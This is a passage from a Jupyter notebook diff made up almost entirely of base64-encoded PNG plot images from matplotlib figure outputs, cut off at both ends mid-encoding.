03nTt3pmPHjkyZMoXvvvsOfX19NBoNU6dOxc7ODoCCggKKiorueo23x9asWTP27NnDoUOH+PHHHxkxYgSzZs3C0dHxvq/1luLi4gq3FUIIUTEyPU8IIZ5CXbp0ITk5maysLABCQ0M5cOAAcXFxXLlyBYCtW7dibGx8x0jHo/LDDz8wZswY3cjOr7/+ilqtLvecbt26ERUVRVFREUVFReVOpytP/fr1ad++PWvWrAHg6tWreHp6snfv3nKvXV5uXnnlFby8vDAyMmLZsmUAdO3alY0bN1JcXIxGo2H69OksXLiw3Ng2bdrElClT6Nq1Kz4+PnTt2pUTJ07c9zU1bNiQ3377DYDt27ffPwlCCCEeiIw0CSHEU6h169b4+Pjw/vvvA2BmZsaePXv4/vvvGTZsGBqNhoYNG/L111/fdxGChzFhwgTGjBlD3bp1qV+/Pp07d+bPP/8s95xBgwbx559/4uTk9K+Luc8//5xPP/0UZ2dniouLcXJywsXFpcz2b775JsOHDy83NwqFgrlz59K3b1/s7Oz46KOPmD9/Pm5ubqjVaqysrPDz8ys3rr59+3L48GF69+5NnTp1aNKkCSqV6r6vx9/fn1mzZvHMM8/wxhtvYGZmVvFkCCGEuC+F9l5zHoQQQgghhBBCADI9TwghhBBCCCHKJUWTEEIIIYQQQpRDiiYhhBBCCCGEKIcUTUIIIYQQQghRDimahBBCCCGEEKIcUjQJIYQQQgghRDmkaBJCCCGEEEKIckjRJIQQQgghhBDl+H/L6ahTNvPokQAAAABJRU5ErkJggg=="
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/plain": [
+       "<Figure size 820.175x720 with 1 Axes>"
+      ],
+      "image/png": "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